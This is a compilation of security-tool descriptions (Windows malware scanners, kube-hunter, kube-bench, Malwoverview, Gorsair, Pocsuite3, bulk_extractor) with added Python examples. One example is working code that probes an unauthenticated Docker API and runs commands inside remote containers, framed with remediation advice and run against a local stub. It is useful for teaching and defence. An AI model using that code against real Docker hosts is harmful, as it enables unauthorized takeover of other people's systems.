The Windows Malicious Software Removal Tool (MSRT) helps keep Windows
computers free from prevalent malware. MSRT finds and removes threats
and reverses the changes made by those threats. MSRT is generally
released monthly as part of Windows Update, or as a standalone tool
available for download.
Use this tool:
if you have automatic updates for Windows turned off (with updates on, Windows Update downloads and runs MSRT in the background for you);
if you suspect an infection by a prevalent malware family.
Microsoft Safety Scanner is a scan tool designed to find and remove
malware from Windows computers. Download it and run a scan to find
malware and try to reverse the changes made by the threats it identifies.
Safety Scanner only scans when manually triggered, and a downloaded copy
can be used for 10 days, after which it expires. We recommend that you
always download the latest version of this tool before each scan, since
the signatures it carries are only as current as the download.
kube-hunter is an open-source tool that hunts for security issues in
your Kubernetes clusters. It is designed to increase awareness and
visibility of the security controls in Kubernetes environments.
kube-hunter is available as a container (aquasec/kube-hunter), and there is also a web site at kube-hunter.aquasec.com
where you can register online to receive a token allowing you to see and
share the results online. You can also run the Python code yourself as
described below. Run it only against clusters you own or are authorized
to test, as it probes the cluster's network services.
kube-bench is a Go application that checks whether Kubernetes is deployed securely by running the checks documented in the CIS Kubernetes Benchmark:
"An objective, consensus-driven security guideline for the Kubernetes Server Software."
Note that it is impossible to inspect the master nodes of managed
clusters such as GKE, EKS and AKS with kube-bench, as one does not have
access to those nodes; it is still possible to use kube-bench to
check worker node configuration in these environments.
Tests are configured with YAML files, making this tool easy to update as test specifications evolve.
Sample Output:
CIS Kubernetes Benchmark support
kube-bench supports the tests for Kubernetes as defined in CIS Benchmarks 1.0.0 to 1.4.0:

| CIS Kubernetes Benchmark | kube-bench config | Kubernetes versions |
|---|---|---|
| 1.0.0 | 1.6 | 1.6 |
| 1.1.0 | 1.7 | 1.7 |
| 1.2.0 | 1.8 | 1.8-1.10 |
| 1.3.0 | 1.11 | 1.11-1.12 |
| 1.4.0 | 1.13 | 1.13- |
By default kube-bench will determine the test set to run based on the Kubernetes version running on the machine.
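As an added worked example (not kube-bench's own code), the following Python reimplements in miniature what a kube-bench YAML test does: parse the flags of a control-plane process command line, compare them against the `flag`, `compare` and `set` items a check declares, and pick the benchmark version from the Kubernetes version using the table above. The check ids, the two kube-apiserver command lines and the dict shape standing in for the YAML are assumptions made here for illustration.

```python
"""Evaluate kube-bench-style CIS checks against a process command line.

Added illustration of how kube-bench's YAML-defined tests work; this is not
kube-bench's own code. Each check mirrors the fields a kube-bench YAML entry
carries (id, text, tests/test_items with flag + compare or set, remediation,
scored). Check ids are illustrative, and the two command lines are
constructed samples of what `ps -ef | grep kube-apiserver` might show.
"""
import shlex

# Constructed sample process command lines (assumption: trimmed to the
# flags the checks below look at).
WEAK_APISERVER = (
    "kube-apiserver --advertise-address=10.0.0.10 --anonymous-auth=true "
    "--insecure-port=8080 --authorization-mode=AlwaysAllow"
)
HARDENED_APISERVER = (
    "kube-apiserver --advertise-address=10.0.0.10 --anonymous-auth=false "
    "--insecure-port=0 --authorization-mode=Node,RBAC "
    "--audit-log-path=/var/log/kubernetes/audit.log"
)

# Check definitions in the shape of a kube-bench YAML group (ids illustrative).
CHECKS = [
    {"id": "1.1.1", "text": "Ensure that --anonymous-auth is set to false",
     "tests": {"test_items": [{"flag": "--anonymous-auth",
                               "compare": {"op": "eq", "value": "false"}}]},
     "remediation": "Set --anonymous-auth=false on the API server", "scored": True},
    {"id": "1.1.2", "text": "Ensure that --insecure-port is set to 0",
     "tests": {"test_items": [{"flag": "--insecure-port",
                               "compare": {"op": "eq", "value": "0"}}]},
     "remediation": "Set --insecure-port=0", "scored": True},
    {"id": "1.1.3", "text": "Ensure that --authorization-mode does not include AlwaysAllow",
     "tests": {"test_items": [{"flag": "--authorization-mode",
                               "compare": {"op": "nothave", "value": "AlwaysAllow"}}]},
     "remediation": "Use --authorization-mode=Node,RBAC", "scored": True},
    {"id": "1.1.4", "text": "Ensure that --audit-log-path is set",
     "tests": {"test_items": [{"flag": "--audit-log-path", "set": True}]},
     "remediation": "Enable audit logging with --audit-log-path", "scored": True},
]

# The page's table, used the way kube-bench picks a test set by default:
# (minimum Kubernetes version, CIS benchmark version), newest first.
BENCHMARK_FOR_K8S = [("1.13", "1.4.0"), ("1.11", "1.3.0"), ("1.8", "1.2.0"),
                     ("1.7", "1.1.0"), ("1.6", "1.0.0")]


def parse_flags(cmdline):
    """Return {flag: value} for both --flag=value and --flag value forms."""
    tokens = shlex.split(cmdline)
    flags, i = {}, 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("--"):
            if "=" in tok:
                name, value = tok.split("=", 1)
            elif i + 1 < len(tokens) and not tokens[i + 1].startswith("--"):
                name, value, i = tok, tokens[i + 1], i + 1
            else:
                name, value = tok, ""
            flags[name] = value
        i += 1
    return flags


def compare(actual, op, expected):
    """The comparison operators a test item can ask for (subset)."""
    if op == "eq":
        return actual == expected
    if op == "noteq":
        return actual != expected
    if op == "has":
        return expected in actual.split(",")
    if op == "nothave":
        return expected not in actual.split(",")
    raise ValueError(f"unsupported op: {op}")


def evaluate(check, flags):
    """PASS only if every test item holds; a missing flag fails a compare."""
    for item in check["tests"]["test_items"]:
        present = item["flag"] in flags
        if "set" in item and item["set"] != present:
            return "FAIL"
        cmp_ = item.get("compare")
        if cmp_ and not (present and compare(flags[item["flag"]], cmp_["op"], cmp_["value"])):
            return "FAIL"
    return "PASS"


def run_checks(cmdline, checks=CHECKS):
    """Map check id -> PASS/FAIL for one process command line."""
    flags = parse_flags(cmdline)
    return {c["id"]: evaluate(c, flags) for c in checks}


def benchmark_version(k8s_version):
    """CIS benchmark for a Kubernetes version per the table above, None if too old."""
    major, minor = (int(x) for x in k8s_version.lstrip("v").split(".")[:2])
    for floor, bench in BENCHMARK_FOR_K8S:
        fmaj, fmin = (int(x) for x in floor.split("."))
        if (major, minor) >= (fmaj, fmin):
            return bench
    return None


if __name__ == "__main__":
    for label, cmd in (("weak", WEAK_APISERVER), ("hardened", HARDENED_APISERVER)):
        print(label, run_checks(cmd))
    print("k8s 1.10.3 ->", benchmark_version("1.10.3"))
```

The real tool runs the `audit` command from each YAML entry (typically a `ps -ef | grep` for the component) and applies the same kind of flag comparison to its output; the point of the example is that a check is just "flag present, flag absent, or flag compared to a value", which is also why a flag set in a config file rather than on the command line needs a different audit command.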
Malware analysis tools were developed to provide students with comprehensive hands-on exposure to the processes, tools and procedures used to identify common types of malware and to quickly determine their capabilities and threat level.
Version 1.6.0 of the Malwoverview tool is now available.
Malwoverview.py is a first-response tool for performing an initial, quick triage of a directory of malware samples, a single sample, or a suspect URL.
https://github.com/alexandreborges/malwoverview
This version:
* uses the Hybrid Analysis API version 2.4.0;
* includes certificate information in the Hybrid Analysis report;
* includes MITRE ATT&CK information in the Hybrid Analysis report;
* includes an option to download samples from Hybrid Analysis.
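The offline half of such a triage, as an added example that is not Malwoverview's code: hash every file in a directory, classify it from its magic bytes, and use Shannon entropy as a packing or encryption hint. That is what you look at before deciding which samples are worth submitting to a service like Hybrid Analysis, bearing in mind that submitting a sample discloses it to that service. The magic table, the 7.0 bits/byte threshold and the sample files are assumptions constructed for the example.

```python
"""Local first-pass triage of a directory of suspect files.

Added example, not code from Malwoverview (which delegates to Hybrid Analysis
and other online services). It covers the offline part of a quick triage:
hashes, magic-based type, size and Shannon entropy as a packing hint. The
sample files are constructed in a temporary directory by build_sample_dir().
"""
import hashlib
import math
import os
import tempfile
from collections import Counter

# Magic-number table (assumption: a handful of common formats is enough here).
MAGIC = [
    (b"MZ", "PE/DOS executable"),
    (b"\x7fELF", "ELF executable"),
    (b"%PDF", "PDF document"),
    (b"PK\x03\x04", "ZIP container (Office/JAR/APK)"),
    (b"\xd0\xcf\x11\xe0", "OLE2 compound document (legacy Office)"),
    (b"#!", "script with shebang"),
]

# Heuristic threshold (assumption): above 7.0 bits/byte an executable is
# usually packed, encrypted, or carrying an encrypted payload.
PACKED_ENTROPY = 7.0


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def file_type(data):
    """Best-effort type from leading magic bytes, 'unknown' if nothing matches."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "unknown"


def triage_file(path):
    """One record per file: identity (hashes), type, size, entropy, packed hint."""
    with open(path, "rb") as fh:
        data = fh.read()
    kind = file_type(data)
    entropy = shannon_entropy(data)
    return {
        "name": os.path.basename(path),
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "type": kind,
        "entropy": round(entropy, 2),
        "likely_packed": kind != "unknown" and entropy > PACKED_ENTROPY,
    }


def triage_directory(directory):
    """Triage every file, most interesting first: known types, then high entropy."""
    results = [triage_file(os.path.join(directory, n))
               for n in sorted(os.listdir(directory))]
    results.sort(key=lambda r: (r["type"] == "unknown", -r["entropy"]))
    return results


def build_sample_dir():
    """Constructed sample set: a padded PE stub, a high-entropy PE, a PDF, a note."""
    d = tempfile.mkdtemp(prefix="triage_")
    files = {
        "dropper.exe": b"MZ" + b"\x00" * 4094,
        "packed.exe": b"MZ" + bytes(range(256)) * 16,
        "invoice.pdf": b"%PDF-1.4\n%fake\n" + b"A" * 100,
        "README.txt": b"not malware, just notes\n",
    }
    for name, content in files.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(content)
    return d


if __name__ == "__main__":
    for rec in triage_directory(build_sample_dir()):
        print(f"{rec['name']:12} {rec['type']:28} {rec['entropy']:5} "
              f"packed={rec['likely_packed']} sha256={rec['sha256'][:16]}...")
```

The SHA-256 column is what you would feed to the hash lookups Malwoverview performs; hashing before uploading lets you check whether a sample is already known without disclosing it.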
Gorsair is a penetration testing tool for discovering and remotely
accessing Docker APIs from vulnerable Docker containers. Once it has
access to the Docker daemon, you can use Gorsair to execute commands
directly in remote containers.
Gorsair hacks its way into remote docker containers that expose their APIs.
Exposing the Docker API on the internet is a tremendous risk: anyone who
can reach it can enumerate every other container and image on the host
and read their configuration, and because the daemon itself runs as root,
they can also start a new container with the host filesystem mounted or
with the --privileged flag and take over the whole system, regardless of
which user the existing images run as.
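To make that risk concrete, here is an added example (not Gorsair's code) of the two steps Gorsair automates against a daemon listening on tcp://:2375 without TLS client authentication: confirm that GET /version answers unauthenticated, list the containers, then create and start an exec in one of them. StubDockerDaemon is a constructed in-process stand-in so the block runs offline; against a real lab host you would pass its address to probe_docker. Note that 2376 is conventionally the TLS port, and with tlsverify enabled the same requests are refused without a client certificate, which is the configuration you want.

```python
"""Probe a TCP-exposed Docker daemon and run a command inside a container.

Added example, not Gorsair's code. It speaks the Docker Engine API directly:
GET /version, GET /containers/json, POST /containers/{id}/exec and
POST /exec/{id}/start. StubDockerDaemon is a constructed stand-in that answers
like an unauthenticated dockerd so the example runs offline; to use the
client functions against a lab host, pass its address instead.
"""
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


def _request(base, method, path, body=None, timeout=3.0):
    """One JSON round trip; returns the decoded body, or None when it is empty."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(base + path, data=data, method=method,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        raw = resp.read()
    return json.loads(raw) if raw else None


def probe_docker(host, port=2375):
    """Return the daemon's version info if the API answers unauthenticated, else None."""
    try:
        info = _request(f"http://{host}:{port}", "GET", "/version")
    except (urllib.error.URLError, OSError, ValueError):
        return None
    return info if isinstance(info, dict) and "ApiVersion" in info else None


def list_containers(host, port=2375):
    """Running containers as the daemon reports them (Id, Names, Image, ...)."""
    return _request(f"http://{host}:{port}", "GET", "/containers/json")


def exec_in_container(host, container_id, cmd, port=2375):
    """Create an exec instance for cmd in the container and start it detached."""
    base = f"http://{host}:{port}"
    created = _request(base, "POST", f"/containers/{container_id}/exec",
                       {"AttachStdout": True, "AttachStderr": True, "Cmd": cmd})
    # Detach avoids the hijacked-connection output stream, which urllib cannot read.
    _request(base, "POST", f"/exec/{created['Id']}/start", {"Detach": True, "Tty": False})
    return created["Id"]


class StubDockerDaemon(BaseHTTPRequestHandler):
    """Constructed stand-in for dockerd on tcp:// with no TLS client auth."""
    containers = [{"Id": "c0ffee", "Names": ["/web"], "Image": "nginx:latest"}]
    execs = []  # commands the 'daemon' was asked to run, kept for inspection

    def _send(self, obj, status=200):
        body = json.dumps(obj).encode() if obj is not None else b""
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        if self.path == "/version":
            self._send({"ApiVersion": "1.40", "Version": "19.03.5"})
        elif self.path == "/containers/json":
            self._send(self.containers)
        else:
            self._send({"message": "page not found"}, 404)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = json.loads(self.rfile.read(length) or b"{}")
        if self.path.endswith("/exec"):
            self.execs.append(body.get("Cmd"))
            self._send({"Id": f"exec{len(self.execs)}"}, 201)
        elif self.path.startswith("/exec/") and self.path.endswith("/start"):
            self._send(None)
        else:
            self._send({"message": "page not found"}, 404)

    def log_message(self, *args):
        pass  # keep the example's output to what main prints


def start_stub():
    """Serve the stub on a free loopback port in a background thread."""
    server = HTTPServer(("127.0.0.1", 0), StubDockerDaemon)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    server, port = start_stub()
    print("exposed:", probe_docker("127.0.0.1", port))
    for c in list_containers("127.0.0.1", port):
        print("exec", exec_in_container("127.0.0.1", c["Id"], ["id"], port=port),
              "in", c["Names"][0])
    server.shutdown()
```

Every call above is a plain HTTP request with no credential of any kind, which is the whole problem: the only thing standing between an attacker and the daemon is network reachability, so the fix is to bind the daemon to a Unix socket or to require TLS client certificates (tlsverify), not to rely on the container images running as non-root.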
Install
From a release
Set the following variables:
GORSAIR_VERSION to whatever release you are interested in
OS to your operating system (linux, windows or darwin)
ARCH to your architecture (amd64, arm, or ppc64le)
Then run the following command to install Gorsair. The variables must be braced, because the shell reads an unbraced $OS_$ARCH as a single variable named OS_; GitHub release downloads are served through a redirect, so pass -L; and the downloaded binary needs the execute bit.
curl -L https://github.com/Ullaakut/Gorsair/releases/download/$GORSAIR_VERSION/gorsair_${OS}_${ARCH} --output /usr/local/bin/gorsair && chmod +x /usr/local/bin/gorsair
From the sources
Make sure that you have a Go version that supports modules (1.11 and above)
Make sure that your environment has the GO111MODULE variable set to on
Run go build -o /usr/local/bin/gorsair cmd/*.go from the root of the repository
Command line options
-t, --targets: Set targets according to the nmap target format. Required. Example: --targets="192.168.1.72,192.168.1.74"
-p, --ports: (Default: 2375,2376) Set custom ports. 2375 is the conventional plaintext port and 2376 the TLS port.
-s, --speed: (Default: 4) Set the nmap timing template used for discovery to trade speed against accuracy.
Lower it if you are scanning an unstable or slow network, or raise it on a
fast and reliable one. You may also want to keep it low to keep your
discovery stealthy. See the nmap documentation on timing templates (-T0 to -T5) for details.
Pocsuite3 is an open-source remote vulnerability testing and proof-of-concept development framework developed by the Knownsec 404 Team.
It comes with a powerful proof-of-concept engine and many niche features
for penetration testers and security researchers.
Features
PoC scripts can run in `attack`, `verify` or `shell` mode
Plugin ecosystem
Dynamic loading of PoC scripts from anywhere (local file, Redis, database, Seebug ...)
Loading of multiple targets from anywhere (CIDR, local file, Redis, database, ZoomEye ...)
Results can be easily exported
Dynamic patching and hooking of requests
Usable both as a command-line tool and as an importable Python package
IPv6 support
Global HTTP/HTTPS/SOCKS proxy support
Simple spider API for PoC scripts to use
Integrate with [Seebug](https://www.seebug.org) (for load PoC from Seebug website)
Integrate with [ZoomEye](https://www.zoomeye.org) (for load target from ZoomEye `Dork`)
Integrate with [Ceye](http://ceye.io/) (for verify blind DNS and HTTP request)
More ...
Functions
Vulnerability Testing Framework
Written in Python, it supports two plugin-invoked modes, validation and
exploitation. Pocsuite can import batch targets from files and test
those targets against multiple exploit plugins. (See "Pocsuite usage".)
PoC/Exp Development Kit
Like Metasploit, it is a development kit for pentesters to develop
their own exploits. Based on Pocsuite, you write only the core code
of a PoC/Exp without caring about output formatting and the like.
Several hundred people have written PoC/Exp modules on Pocsuite to
date.
Integratable Module
Users can utilize the auxiliary modules packaged in Pocsuite to
extend their exploit functions, or integrate Pocsuite to develop other
vulnerability assessment tools.
Integrated ZoomEye And Seebug APIs
Pocsuite is also an extremely useful tool for using the Seebug and
ZoomEye APIs together. Vulnerability assessment can be done
automatically and effectively by searching for targets through ZoomEye and
acquiring PoC scripts from Seebug or locally.
Installation
pocsuite3 works out of the box with Python 3.x on any platform.
You can use Git to clone the latest source code repository:
$ git clone git@github.com:knownsec/pocsuite3.git
Or download the latest source zip package and extract it.
The purpose of bulk_extractor is to locate potentially
sensitive information such as email addresses and credit card numbers,
as well as other types of information such as GPS coordinates and image
file types.
bulk_extractor ignores the file system and scans the media linearly.
This, in combination with parallel processing, makes the tool very fast.
It has trouble with fragmented files, but typically files
are not fragmented.
bulk_extractor can be used on Windows, Linux, and Macintosh OS X platforms.
This page contains instructions for downloading, building and
installing bulk_extractor on Linux and OS X, and for downloading and
installing the bulk_extractor binary on Windows. If you would like to
build your own Windows binary
bulk_extractor is a C++ program that scans a disk image, a
file, or a directory of files and extracts useful information without
parsing the file system or file system structures. The results are
stored in feature files that can be easily inspected, parsed, or
processed with automated tools. bulk_extractor also creates histograms of features that it finds, as features that are more common tend to be more important.
We have made the following tools available for processing feature files generated by bulk_extractor:
A small number of Python programs that perform automated processing on feature files.
A Bulk Extractor Viewer User Interface (BEViewer) for browsing features stored in feature files and for launching bulk_extractor scans. Please see page BEViewer.
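An added example of that kind of post-processing, not one of the project's own scripts: it reads the feature-file layout (comment lines beginning with #, then tab-separated offset, feature and context), applies a Luhn check to ccn.txt candidates so that false positives such as sequential digit runs are dropped, and builds a url_services-style histogram from url.txt. The two feature files embedded below are constructed sample data.

```python
"""Post-process bulk_extractor feature files.

Added example, not one of the project's own scripts. It parses the feature
file format (comment lines starting with '#', then tab-separated offset,
feature, context), re-validates ccn.txt candidates with the Luhn check, and
builds a url_services-style histogram of the host part of url.txt features.
SAMPLE_CCN and SAMPLE_URL are constructed sample data.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed samples of ccn.txt and url.txt (offset<TAB>feature<TAB>context).
SAMPLE_CCN = """# BANNER FILE NOT PROVIDED (-b option)
# BULK_EXTRACTOR-Version: 1.5.5
# Feature-Recorder: ccn
# Filename: disk.raw
# Feature-File-Version: 1.1
1048576\t4111111111111111\tcard=4111111111111111&exp=1226
2097152\t1234567812345678\tid:1234567812345678;ref
3145728\t5500 0000 0000 0004\tcc: 5500 0000 0000 0004 cvv
"""

SAMPLE_URL = """# Feature-Recorder: url
65536\thttp://www.example.com/index.html\t<a href="http://www.example.com/index.html">
131072\thttps://mail.example.com/login\tGET https://mail.example.com/login HTTP/1.1
196608\thttp://www.example.com/about\thref="http://www.example.com/about"
262144\thttp://cdn.other.test/x.js\tsrc="http://cdn.other.test/x.js"
"""


def parse_features(text):
    """Yield (offset, feature, context); skip comment and blank lines."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) < 2:
            continue  # malformed line: skip it, the file is evidence, not source
        offset, feature = parts[0], parts[1]
        context = parts[2] if len(parts) > 2 else ""
        yield offset, feature, context


def luhn_ok(number):
    """Luhn checksum over the digits only; rejects obviously fake candidates."""
    digits = [int(d) for d in re.sub(r"\D", "", number)]
    if len(digits) < 13:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:  # double every second digit from the right
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def valid_cards(ccn_text):
    """[(offset, number)] for ccn.txt features that pass the Luhn check."""
    return [(off, feat) for off, feat, _ in parse_features(ccn_text) if luhn_ok(feat)]


def url_services_histogram(url_text):
    """Count url.txt features by host, like bulk_extractor's url_services histogram."""
    counts = Counter()
    for _, feature, _ in parse_features(url_text):
        host = urlsplit(feature).hostname
        if host:
            counts[host.lower()] += 1
    return counts


if __name__ == "__main__":
    for offset, number in valid_cards(SAMPLE_CCN):
        print(f"ccn at {offset}: {number}")
    for host, n in url_services_histogram(SAMPLE_URL).most_common():
        print(f"{n:4} {host}")
```

Because the offset column is a forensic path rather than a plain integer when a feature was found inside a decoded object (for example a ZIP member), it is kept as a string here; converting it to an integer would silently break on exactly the hits that are hardest to locate by hand.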
Installation Steps for Windows / Linux :
Output Feature Files
bulk_extractor now creates an output directory that has the following layout:
alerts.txt
Processing errors.
ccn.txt
Credit card numbers
ccn_track2.txt
Credit card "track 2" information, which has previously been found in some bank card fraud cases.
domain.txt
Internet domains found on the drive, including dotted-quad addresses found in text.
email.txt
Email addresses.
ether.txt
Ethernet MAC addresses found through IP packet carving of swap files and compressed system hibernation files and file fragments.
exif.txt
EXIFs from JPEGs and video segments. This feature file contains all of the EXIF fields, expanded as XML records.
find.txt
The results of specific regular expression search requests.
identified_blocks.txt
Block hash values that match hash values in a hash database that the scan was run against.
ip.txt
IP addresses found through IP packet carving.
rfc822.txt
Email message headers including Date:, Subject: and Message-ID: fields.
tcp.txt
TCP flow information found through IP packet carving.
telephone.txt
US and international telephone numbers.
url.txt
URLs, typically found in browser caches, email messages, and pre-compiled into executables.
url_searches.txt
A histogram of terms used in Internet searches from services such as Google, Bing, Yahoo, and others.
url_services.txt
A histogram of the domain name portion of all the URLs found on the media.
wordlist.txt
A list of all “words” extracted from the disk, useful for password cracking.
wordlist_*.txt
The wordlist with duplicates removed, formatted in a form that can be easily imported into a popular password-cracking program.
zip.txt
A file containing information regarding every ZIP file component found
on the media. This is exceptionally useful as ZIP files contain internal
structure and ZIP is increasingly the compound file format of choice
for a variety of products such as Microsoft Office